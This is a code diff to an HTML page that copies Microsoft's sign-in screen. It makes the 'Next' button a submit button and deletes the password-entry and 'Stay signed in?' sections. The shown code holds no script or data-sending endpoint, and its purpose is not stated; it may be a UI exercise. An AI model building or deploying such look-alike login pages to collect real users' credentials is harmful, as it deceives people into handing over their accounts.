--- a/microsoft-login/index.html
+++ b/microsoft-login/index.html
@@ -30,7 +30,7 @@
                 </p>
             </div>
             <div>
-                <button class="btn" id="btn_next">Next</button>
+                <button class="btn" type="submit" id="btn_next">Next</button>
             </div>
         </div>
         <div class="opts">
@@ -39,52 +39,7 @@
         </div>
     </section>
 
-    <section id="section_pwd" class="d-none">
-        <div class="auth-wrapper">
-            <img src="assets/logo.png" alt="Microsoft" class="d-block" />
-            <div class="identity w-100 mt-16 mb-16">
-                <button class="back">
-                    <img src="assets/back.png" />
-                </button>
-                <span id="user_identity">a@b.com</span>
-            </div>
-            <h2 class="title mb-16">Enter password</h2>
-            <form>
-                <div class="mb-16">
-                    <p id="error_pwd" class="error"></p>
-                    <input id="inp_pwd" type="password" name="pass" class="input" placeholder="Password" />
-                </div>
-            </form>
-            <div>
-                <p class="mb-16"> <a href="#" class="link fs-13">Forgot password?</a></p>
-                <p class="mb-16">
-                    <a href="#" class="link fs-13">Other ways to sign in</a>
-                </p>
-            </div>
-            <div>
-                <button class="btn" id="btn_sig">Sign in</button>
-            </div>
-        </div>
-    </section>
-
-    <section id="section_final" class="d-none">
-        <div class="auth-wrapper">
-            <img src="assets/logo.png" alt="Microsoft" class="d-block" />
-            <div class="identity w-100 mt-16 mb-16">
-                <span id="user_identity">a@b.com</span>
-            </div>
-            <h2 class="title mb-16">Stay signed in?</h2>
-            <p class="p">Stay signed in so you don't have to sign in again next time.</p>
-            <label class="has-checkbox">
-                <input type="checkbox" class="checkbox" />
-                <span>Don't show this again</span>
-            </label>
-            <div class="btn-group">
-                <button class="btn btn-sec" id="btn_final">No</button>
-                <button class="btn" id="btn_final">Yes</button>
-            </div>
-        </div>
-    </section>
+    
     <footer class="footer">
         <a href="#">Terms of use</a>
         <a href="#">Privacy & cookies</a>
